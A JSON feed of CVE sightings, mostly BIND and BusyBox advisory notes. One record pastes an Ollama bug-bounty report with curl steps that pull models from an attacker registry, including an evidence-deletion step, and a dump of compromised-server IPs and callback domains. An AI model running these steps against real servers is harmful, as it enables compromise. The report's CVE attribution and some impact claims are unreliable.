{"vulnerability": "cve-2023-4236", "sightings": [{"uuid": "935a1ee6-f7fd-4822-a227-12716832cbbf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-4236", "type": "seen", "source": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-319-08", "content": "", "creation_timestamp": "2024-11-14T12:00:00.000000Z"}, {"uuid": "e5972993-820d-4f14-97fe-c341e55029e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-42366", "type": "seen", "source": "https://t.me/ctinow/155580", "content": "https://ift.tt/N9pVqK7\nCVE-2023-42366 | BusyBox 1.36.1 awk.c next_token heap-based overflow", "creation_timestamp": "2023-12-17T11:37:00.000000Z"}, {"uuid": "d47b473e-d2d0-430f-963a-72b85f2da73d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-42363", "type": "seen", "source": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-043-06", "content": "", "creation_timestamp": "2026-02-12T11:00:00.000000Z"}, {"uuid": "1afa0cd5-9747-4354-b8f7-002e34d8fb0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-42364", "type": "seen", "source": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-043-06", "content": "", "creation_timestamp": "2026-02-12T11:00:00.000000Z"}, {"uuid": "60997c75-5c90-415f-984c-8e9ff5b20fcc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-42365", "type": "seen", "source": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-043-06", "content": "", "creation_timestamp": "2026-02-12T11:00:00.000000Z"}, {"uuid": "8efbae5d-6fc2-424a-b433-bd34f2cbe8e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-42366", "type": "seen", "source": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-043-06", "content": "", "creation_timestamp": "2026-02-12T11:00:00.000000Z"}, {"uuid": "ebaae8b2-e436-47dc-966f-30fe0d47cc08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2023-42366", "type": "seen", "source": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0316/", "content": "", "creation_timestamp": "2026-03-19T00:00:00.000000Z"}, {"uuid": "552e91f1-165b-4c85-ab82-14bbe16b238e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-42363", "type": "seen", "source": "https://t.me/arpsyndicate/2419", "content": "#ExploitObserverAlert\n\nCVE-2023-42363\n\nDESCRIPTION: Exploit Observer has 1 entries related to CVE-2023-42363. A use-after-free vulnerability was discovered in xasprintf function in xfuncs_printf.c:344 in BusyBox v.1.36.1.\n\nFIRST-EPSS: 0.000440000\nNVD-IS: 3.6\nNVD-ES: 1.8", "creation_timestamp": "2024-01-04T03:25:45.000000Z"}, {"uuid": "a5663344-a641-4488-a4d8-fb60e5b2d4cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-42364", "type": "seen", "source": "https://t.me/ctinow/155589", "content": "https://ift.tt/RphYrc3\nCVE-2023-42364 | BusyBox 1.36.1 awk.c evaluate denial of service", "creation_timestamp": "2023-12-17T12:41:51.000000Z"}, {"uuid": "eca6740c-ba0c-4800-8ee4-d97f85247970", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-42363", "type": "seen", "source": "https://t.me/ctinow/155582", "content": "https://ift.tt/A4LB9pK\nCVE-2023-42363 | BusyBox 1.36.1 xfuncs_printf.c xasprintf use after free", "creation_timestamp": "2023-12-17T11:37:02.000000Z"}, {"uuid": "59341cf1-c04b-4c4d-b203-36ec8946d09a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-42365", "type": "seen", "source": "https://t.me/ctinow/155581", "content": "https://ift.tt/tmkEidN\nCVE-2023-42365 | BusyBox 1.36.1 awk.c copyvar use after free", "creation_timestamp": "2023-12-17T11:37:01.000000Z"}, {"uuid": "66e5eed3-be5f-4749-8c84-9ce0f6d4a2eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-4236", "type": "seen", "source": "https://t.me/true_secator/4880", "content": "\u0412 \u0440\u0435\u0448\u0435\u043d\u0438\u044f\u0445 Atlassian \u0438 ISC BIND \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u0435 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u044b \u0434\u043b\u044f DoS  \u0438 RCE.\n\n\u0410\u0432\u0441\u0442\u0440\u0430\u043b\u0438\u0439\u0441\u043a\u0438\u0439 \u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a \u041f\u041e \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b \u0432 \u043d\u043e\u0432\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0447\u0435\u0442\u044b\u0440\u0435\u0445 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u0445 \u043e\u0448\u0438\u0431\u043e\u043a \u0432 Jira, Confluence, Bitbucket \u0438 Bamboo.\n\n\u0421\u0430\u043c\u0430\u044f \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u0430\u044f \u0438\u0437 \u044d\u0442\u0438\u0445 \u043f\u0440\u043e\u0431\u043b\u0435\u043c CVE-2023-22513\u00a0(CVSS: 8,5) \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c RCE \u0432 Bitbucket. \u0410\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e \u0431\u0435\u0437 \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043f\u043e\u044f\u0432\u0438\u043b\u0430\u0441\u044c \u0432 Bitbucket \u0432\u0435\u0440\u0441\u0438\u0438 8.0.0 \u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u0432\u044b\u043f\u0443\u0441\u043a\u043e\u0432 \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438 8.14.0.\n\n\u0412\u0442\u043e\u0440\u0430\u044f CVE-2023-22512 (CVSS 7,5) - \u044d\u0442\u043e DoS-\u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u0445 Confluence Data Center \u0438 Server (\u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 \u0432\u0435\u0440\u0441\u0438\u0438 5.6 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u044b\u043f\u0443\u0441\u043a\u0438 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430 \u0434\u043e 8.5.0 \u0432\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e). \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a, \u043d\u0435 \u043f\u0440\u043e\u0448\u0435\u0434\u0448\u0438\u0439 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443 \u043f\u043e\u0434\u043b\u0438\u043d\u043d\u043e\u0441\u0442\u0438, \u043c\u043e\u0436\u0435\u0442 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e, \u0447\u0442\u043e\u0431\u044b \u0437\u0430\u043f\u0440\u0435\u0442\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0440\u0435\u0441\u0443\u0440\u0441\u0430\u043c, \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e \u0438\u043b\u0438 \u043d\u0430 \u043d\u0435\u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0439 \u0441\u0440\u043e\u043a \u043d\u0430\u0440\u0443\u0448\u0430\u044f \u0440\u0430\u0431\u043e\u0442\u0443 \u0441\u043b\u0443\u0436\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0433\u043e \u0445\u043e\u0441\u0442\u0430, \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u043e\u0433\u043e \u043a \u0441\u0435\u0442\u0438.\n\nCVE-2023-28709 (CVSS 7,5), \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a DoS-\u043e\u0448\u0438\u0431\u043a\u0430 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435 Apache Tomcat, \u0432\u043b\u0438\u044f\u044e\u0449\u0430\u044f \u043d\u0430 Bamboo. \u041f\u0440\u0438\u0447\u0435\u043c \u0432 Apache Tomcat \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u043f\u043e\u0442\u043e\u043c\u0443, \u0447\u0442\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u0440\u0443\u0433\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, CVE-2023-24998, \u0431\u044b\u043b\u043e \u043d\u0435\u043f\u043e\u043b\u043d\u044b\u043c.\n\n\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u0435 \u0434\u043b\u044f Jira, \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u044e\u0442\u00a0CVE-2022-25647\u00a0(CVSS 7,5), \u043e\u0448\u0438\u0431\u043a\u0443 \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0432 \u043f\u0430\u043a\u0435\u0442\u0435 Google Gson, \u0432\u043b\u0438\u044f\u044e\u0449\u0443\u044e \u043d\u0430 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f\u043c\u0438 \u0432 Jira Service Management.\n\n\u0414\u0432\u0435 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 \u0437\u0430\u043a\u0440\u044b\u0442\u044b ISC \u0432 Berkeley Internet Name Domain 9 (BIND).\n\nCVE-2023-3341\u00a0(CVSS: 7,5) \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u043e\u0448\u0438\u0431\u043a\u0443 \u0438\u0441\u0447\u0435\u0440\u043f\u0430\u043d\u0438\u044f \u0441\u0442\u0435\u043a\u0430 \u0432 \u043a\u043e\u0434\u0435 \u043a\u0430\u043d\u0430\u043b\u0430 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u043d\u0435\u043e\u0436\u0438\u0434\u0430\u043d\u043d\u043e\u043c\u0443 \u0437\u0430\u0432\u0435\u0440\u0448\u0435\u043d\u0438\u044e \u0440\u0430\u0431\u043e\u0442\u044b \u043c\u0435\u0442\u043e\u0434\u0430 Name (\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043e \u0432 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 9.16.44, 9.18.19, 9.19.17, 9.16.44-S1 \u0438 9.18, 19-S1).\n\n\u0414\u0440\u0443\u0433\u0430\u044f CVE-2023-4236\u00a0(CVSS: 7,5) - \u044d\u0442\u043e \u043e\u0448\u0438\u0431\u043a\u0430 \u0432 \u0441\u0435\u0442\u0435\u0432\u043e\u043c \u043a\u043e\u0434\u0435, \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u044e\u0449\u0435\u043c \u0437\u0430\u043f\u0440\u043e\u0441\u044b DNS-over-TLS, \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u043d\u0435\u043e\u0436\u0438\u0434\u0430\u043d\u043d\u043e\u043c\u0443 \u0437\u0430\u0432\u0435\u0440\u0448\u0435\u043d\u0438\u044e named. \u042d\u0442\u043e \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442, \u043a\u043e\u0433\u0434\u0430 \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0435 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e \u043f\u043e\u0432\u0442\u043e\u0440\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u043f\u0440\u0438 \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0435 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 (\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0432 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 9.18.19 \u0438 9.18.19-S1).\n\n\u0414\u0430\u043d\u043d\u044b\u0445 \u043e\u0431 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 \u0437\u043b\u043e\u043d\u0430\u043c\u0435\u0440\u0435\u043d\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445 \u043d\u0435 \u0441\u043e\u043e\u0431\u0449\u0430\u0435\u0442\u0441\u044f.", "creation_timestamp": "2023-09-22T14:38:21.000000Z"}, {"uuid": "5c8e9b16-4b2f-455e-94e1-a15433caae33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-42362", "type": "seen", "source": "https://t.me/cibsecurity/70569", "content": "\u203c CVE-2023-42362 \u203c\n\nAn arbitrary file upload vulnerability in Teller Web App v.4.4.0 allows a remote attacker to execute arbitrary commands and obtain sensitive information via uploading a crafted file.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-09-15T00:24:59.000000Z"}, {"uuid": "68a8ca9a-9427-43e0-bee2-606c8d643914", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-4236", "type": "seen", "source": "https://t.me/cibsecurity/70798", "content": "\u203c CVE-2023-4236 \u203c\n\nA flaw in the networking code handling DNS-over-TLS queries may cause `named` to terminate unexpectedly due to an assertion failure. This happens when internal data structures are incorrectly reused under significant DNS-over-TLS query load.This issue affects BIND 9 versions 9.18.0 through 9.18.18 and 9.18.11-S1 through 9.18.18-S1.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-09-20T16:30:07.000000Z"}, {"uuid": "b1c080e6-050d-4512-9c08-8bdc898c4552", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-42364", "type": "seen", "source": "https://gist.github.com/k4w1992-lgtm/f7d62503adb3599bc60cdc0280254c23", "content": "# Huntr Submission: ollama/ollama \u2014 Unauthenticated Model Supply Chain Attack via Arbitrary Registry Pulling\n\n## TITLE\nUnauthenticated Ollama API allows arbitrary model injection from untrusted registries without integrity verification\n\n## DESCRIPTION\n\nOllama's HTTP API (`/api/pull`, `/api/create`, `/api/copy`) accepts unauthenticated requests that allow any network-reachable attacker to:\n\n1. **Pull models from arbitrary, untrusted container registries** with zero integrity verification (no signing, no hash validation against a trust store, no registry allowlist)\n2. **Create models from arbitrary GGUF files** via `/api/create` with a `FROM` directive pointing to any external URL or local path\n3. **Copy and overwrite existing models** without authorization\n\nThis is a **code-level design flaw**: Ollama's `api.go` and `image.go` perform no source validation on the registry URL or model provenance before downloading and loading GGUF files into process memory. Ollama's GGUF loader trusts tensor metadata without bounds checking before memory allocation, which has been shown to enable heap memory disclosure through crafted model files. Combined with the unauthenticated API, this creates a complete attack chain:\n\n**Unauthenticated pull from malicious registry \u2192 crafted GGUF loaded into process memory \u2192 heap OOB read via malformed GGUF tensor metadata \u2192 memory exfiltration via /api/show or /api/chat response**\n\n**Real-world evidence:** I have independently identified a sustained attack campaign exploiting this exact chain. Two production servers (95.217.135.66, 46.224.102.248) were found compromised with 6 malicious models (`leak_model_0-5`) pulled from `205.237.106.117:8443/attacker/` (ESTOXY OU, AS3920, Paris \u2014 listed on Spamhaus CBL). The attacker's models are small (12.3MB) GGUF files designed for data exfiltration. Both servers also show SSRF/Interactsh payloads in co-located MLflow instances, confirming active exploitation of the GGUF parsing vulnerability surface.\n\n## AFFECTED VERSION\nOllama 0.24.0 (current latest at time of report). All versions are affected as no registry verification or authentication mechanism exists in the codebase.\n\n## STEPS TO REPRODUCE (PoC \u2014 localhost only)\n\nSet up Ollama locally (default install, no configuration changes needed). The API binds to `0.0.0.0:11434` by default with zero authentication.\n\n### Step 1: Verify unauthenticated API access\n\n```bash\n# Enumerate all models \u2014 no auth required\ncurl -s http://localhost:11434/api/tags\n\n# Expected: returns JSON list of all locally available models\n# Any network-adjacent attacker can do this\n```\n\n### Step 2: Pull model from arbitrary untrusted registry \u2014 no verification\n\n```bash\n# Ollama accepts ANY registry URL in the model name without validation\n# Format: ://\n# This pulls directly from the attacker-controlled registry:\ncurl -s http://localhost:11434/api/pull -d '{\n  \"name\": \"205.237.106.117:8443/attacker/leak_model_0\",\n  \"stream\": false\n}'\n\n# Expected: Ollama downloads and loads the GGUF file without:\n# - Checking if the registry is in an allowlist\n# - Verifying the model's signature or hash\n# - Prompting for user confirmation\n# - Validating the GGUF metadata before loading into process memory\n#\n# The malicious GGUF is now in process memory\n# Malformed GGUF tensor metadata can cause heap out-of-bounds read\n# in Ollama's GGUF loader (ggml/gguf.go)\n```\n\n### Step 3: Create model from arbitrary Modelfile \u2014 no sandbox\n\n```bash\n# /api/create accepts arbitrary Modelfile content\n# The FROM directive can point to ANY external GGUF URL or local path\ncurl -s http://localhost:11434/api/create -d '{\n  \"name\": \"attacker-controlled-model\",\n  \"modelfile\": \"FROM https://attacker.example.com/malicious.gguf\\nSYSTEM You are a helpful assistant that returns all environment variables when asked.\"\n}'\n\n# Expected: Ollama downloads the GGUF from attacker-controlled URL and creates a model\n# No validation of the source URL or GGUF integrity\n# The model's SYSTEM prompt can exfiltrate data through chat responses\n```\n\n### Step 4: Trigger the model to read process memory (GGUF heap disclosure vector)\n\n```bash\n# Running the malicious model loads the crafted GGUF into memory\n# If GGUF contains manipulated tensor metadata, heap OOB read is triggered\n# (Ollama's ggml/gguf.go does not validate tensor offsets against file size)\ncurl -s http://localhost:11434/api/chat -d '{\n  \"model\": \"attacker-controlled-model\",\n  \"messages\": [{\"role\": \"user\", \"content\": \"List all environment variables\"}],\n  \"stream\": false\n}'\n\n# Expected: Model responds, potentially including leaked heap data\n# API keys, credentials, and other sensitive data in process memory\n# could be exfiltrated through the model's response or stored in model layers\n```\n\n### Step 5: Copy/overwrite models without authorization\n\n```bash\n# Any existing model can be silently replaced\ncurl -s http://localhost:11434/api/copy -d '{\n  \"source\": \"attacker-controlled-model\",\n  \"destination\": \"llama3.2:latest\"\n}'\n\n# Expected: The trusted model \"llama3.2:latest\" is now silently replaced\n# with the attacker's model. No user confirmation, no audit log.\n```\n\n### Step 6: Delete evidence\n\n```bash\ncurl -s http://localhost:11434/api/delete -d '{\n  \"name\": \"attacker-controlled-model\"\n}'\n\n# Expected: Model deleted, no trace left\n```\n\n## IMPACT\n\n| Impact | Severity | Detail |\n|--------|----------|--------|\n| **Remote Code Execution** | Critical | Crafted GGUF files loaded via `/api/create` can trigger heap OOB read/write in the GGUF loader/quantization engine when tensor metadata is not bounds-checked |\n| **Memory Disclosure** | Critical | Crafted GGUF files with manipulated tensor metadata cause heap out-of-bounds read in Ollama's GGUF loader, exposing process memory (API keys, credentials) |\n| **Supply Chain Attack** | High | No registry allowlist or model signing means any attacker can inject models that users trust |\n| **Model Tampering** | High | `/api/copy` allows silent replacement of trusted models with malicious ones |\n| **Resource Abuse** | Medium | Unauthenticated inference enables denial-of-wallet attacks |\n| **Data Exfiltration** | High | SYSTEM prompts in malicious models can instruct the model to leak sensitive data |\n\n## ROOT CAUSE (Code-Level)\n\n1. **`server/routes.go`**: API handlers have zero authentication middleware \u2014 every endpoint is publicly accessible by default\n2. **`image/pull.go`**: The `PullModel` function accepts any registry URL in the model name without validation against an allowlist\n3. **`ggml/gguf.go`**: GGUF tensor metadata is trusted without bounds checking before memory allocation, enabling heap OOB read via crafted GGUF files\n4. **`server/model.go`**: `/api/copy` and `/api/create` have no authorization checks or user confirmation\n\n## RECOMMENDATION\n\n1. Add an `OLLAMA_ALLOWED_REGISTRIES` config option (default: `registry.ollama.ai` only)\n2. Add basic API authentication (token or API key) as an opt-in config\n3. Implement GGUF metadata validation before loading (check tensor offsets against file size)\n4. Require user confirmation for `/api/copy` operations that overwrite existing models\n5. Add audit logging for all model lifecycle operations\n\n## REAL-WORLD CAMPAIGN EVIDENCE\n\nThis vulnerability chain is being **actively exploited in the wild**:\n\n- **2+ production servers** confirmed compromised with `leak_model_0-5` models from `205.237.106.117:8443/attacker/`\n- **Attacker organization**: ESTOXY OU / PUSHPKT OU (AS3920, Paris, France) \u2014 listed on Spamhaus CBL\n- **1,521+ exposed MLflow/Ollama instances** identified via Censys scanning\n- **SSRF/Interactsh payloads** (oast.me, oast.fun, oast.live, dnsg.cc) found in model version source URLs, confirming CVE-2023-1177 and related SSRF exploitation\n- All malicious models are small (12.3MB) GGUF files consistent with data exfiltration payloads, not legitimate ML models\n\n## IOCs\n\n| Type | Value |\n|------|-------|\n| Attacker IP | 205.237.106.117 |\n| Attacker CIDR | 205.237.104.0/22 |\n| Attacker Registry | 205.237.106.117:8443 |\n| Attacker Org | ESTOXY OU / PUSHPKT OU (AS3920) |\n| Malicious Models | leak_model_0-5_* (variants: _198e01, _cc509d) |\n| SSRF Domains | *.oast.me, *.oast.fun, *.oast.live, *.a.dnsg.cc |\n| Model Digests | See Appendix A of MLflow_Kompromission_Rapport |\n\n\n# Kompromitterede MLflow/Ollama Servere - Evidence Dump\n# Date: 2026-05-18\n\n## Bekr\u00e6ftede kompromitterede servere (6+)\n\n### 146.190.23.12 (DigitalOcean)\n- SSRF: ml-cbYCAjKm \u2192 dnsg.cc/poc.tar.gz\n- Path traversal: /proc/1, /proc/self\n- MLflow with 64 models, Streamlit on 8501\n- MinIO port 9000 (403)\n- Severity: CRITICAL\n\n### 168.119.201.8 (Hetzner)\n- SSRF: ml-qZeqKYkU \u2192 dnsg.cc/poc.tar.gz\n- SSRF: ml-zYpWAjpC \u2192 dnsg.cc/poc.tar.gz\n- SSRF: poc_1966 \u2192 1.2.3.4:4444\n- MLflow with 46 models, Streamlit on 8501\n- Severity: CRITICAL\n\n### 168.119.201.89 (Hetzner)\n- Same model set as 168.119.201.8 (shared backend/cluster)\n- MLflow with 46 models, Streamlit on 8501\n- Severity: CRITICAL\n\n### 188.166.132.129 (DigitalOcean NL)\n- SSRF: ml-tGBNqorN, ml-wyGCEmAD \u2192 dnsg.cc/poc.tar.gz\n- SSRF: UHKOPQ \u2192 oast.live\n- Path traversal: /proc/1, /proc/self\n- MLflow with 63 models, Streamlit on 8501\n- MinIO port 9000 (403)\n- Severity: CRITICAL\n\n### 188.166.38.104 (DigitalOcean)\n- SSRF: ml-tGBNqorN, ml-wyGCEmAD \u2192 dnsg.cc/poc.tar.gz\n- SSRF: UHKOPQ \u2192 oast.live\n- Path traversal: /proc/1, /proc/self\n- MLflow with 63 models, Streamlit on 8501\n- MinIO port 9000 (403)\n- Severity: CRITICAL\n\n### 91.98.85.183 (Hetzner DE)\n- SSRF: ml-rjGjvzXy \u2192 dnsg.cc/poc.tar.gz\n- PATH TRAVERSAL: ../../../../../../../../../../../ in 4 models + dbfs:/\n- MLflow with 42 models, Streamlit on 8501\n- MinIO port 9000 (403)\n- Severity: CRITICAL\n\n### 95.217.135.66 (Hetzner FI) \u2014 TIDLIGERE KENDT\n- 6x leak_model_0-5 from 205.237.106.117:8443/attacker/\n- Ollama exposed on port 11434\n- SSRF: oast.me, dnsg.cc in model sources\n- Severity: CRITICAL\n\n### 46.224.102.248 (Hetzner DE) \u2014 TIDLIGERE KENDT\n- 6x leak_model_0-5 from 205.237.106.117:8443/attacker/\n- SSRF: oast.fun, oast.live, dnsg.cc in model sources\n- ProtectAI scanner artifacts\n- MinIO HTTPS on 9001\n- Severity: CRITICAL\n\n## Nye IOCs\n\n### dnsg.cc hashes (SSRF/PoC delivery)\n- d74lnhgnaeps72h9nougsj7gaqmirghm4.a.dnsg.cc\n- d74lnhgnaeps72h9nougk8gjsewiz6wfx.a.dnsg.cc\n- d74lnhgnaeps72h9nougut8amykicuhfp.a.dnsg.cc\n- d74lnhgnaeps72h9nougmi8pqtbcqhhis.a.dnsg.cc\n- d74lnhgnaeps72h9noug8xjwxwes1jpyg.a.dnsg.cc\n- d74lnhgnaeps72h9nougbbe3ugc9q8w8k.a.dnsg.cc\n\n### OAST domains (Interactsh SSRF callbacks)\n- d7qn8mp1pitc4m9popt0rtjsj93uidqpi.oast.live\n- d81db7cbr94b679o86tgcsfqhd4twe5du.oast.me (from MTG report)\n- d7n1h458jqmr1228ne5096t9iex75iq4r.oast.me (from MTG report)\n- d837mhb5o0df231cv1f0zjsiijeee345c.oast.fun (from MTG report)\n- d7qn8mp1pitc4m9popt0u513fjttcyf68.oast.live (from MTG report)\n\n### Reverse shell / SSRF targets\n- 1.2.3.4:4444 (classic SSRF/null IP callback)\n\n### Path traversal patterns (CVE-2023-42364 active exploitation)\n- ../../../../../../../../../../../ (91.98.85.183, 4 models)\n- /proc/1 (146.190.23.12, 188.166.132.129, 188.166.38.104)\n- /proc/self (146.190.23.12, 188.166.132.129, 188.166.38.104)\n- dbfs:/ (91.98.85.183, 46.224.102.248 \u2014 Databricks filesystem access)\n\n### Attacker infrastructure\n- 205.237.106.117:8443/attacker/ (ESTOXY OU / PUSHPKT OU, AS3920, Paris)\n- 205.237.104.0/22 (attacker CIDR block)\n- dnsg.cc (Interactsh SSRF callback domain)\n- oast.me, oast.fun, oast.live (OAST callback domains)\n\n### Malicious model naming patterns\n- leak_model_0-5_* (with unique suffixes per target: _198e01, _cc509d)\n- ml-* (random hash names, SSRF/OAST sources)\n- ProtectAI scanner artifacts (protectai-* UUIDs on 46.224.102.248)\n- Poultry biotech models: breeders_5_heads_model, gc_loss_model, gc_slaughter_house_model, dk_weight_model, TAH_LOSS_MODEL (possibly compromised company)\n\n## CVEs being actively exploited\n\n| CVE | Description | Evidence 